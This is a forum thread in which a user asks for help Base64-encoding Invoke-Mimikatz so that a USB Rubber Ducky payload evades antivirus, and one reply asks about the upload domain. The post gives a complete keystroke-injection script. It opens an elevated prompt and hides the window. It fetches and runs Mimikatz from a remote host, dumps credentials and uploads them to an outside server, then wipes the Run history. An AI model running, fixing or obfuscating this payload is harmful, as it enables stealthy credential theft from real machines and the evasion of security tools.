Invoke-Mimikatz encoded to avoid antivirus detection

[matteoca]

Hi, I'm trying to avoid antivirus detection of the Invoke-Mimikatz script mentioned here https://www.hak5.org/blog/15-second-password-hack-mr-robot-style 

I think the only safe way is Base64-encoding the Invoke-Mimikatz script and then decoding it modifying this string in the Powershell script on Rubber Ducky:

 

STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)"

I've found some useful links (https://astr0baby.wordpress.com/2017/03/28/mimikatz-2-1-1-powershell-generator/ and https://blog.den1al.com/2015/02/encoded-mimikatz-powershell-invoker/ but my coding skills are very limited and I'm searching some help to successfully modify the scripts to work with Rubber Ducky.

 

This is my faulty payload:

 

REM Title: Invoke mimikatz and send creds to remote server
REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi
DELAY 1000
REM Open an admin command prompt 
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
REM Obfuscate the command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://htmlguru.tk/im.ps1'))); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://htmlguru.tk/rx.php', $output)"
ENTER
DELAY 15000
REM Clear the Run history and exit
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
ENTER

 

Thank you in advance for help!

[Garfield025]

What domain have you used to upload the resulting file?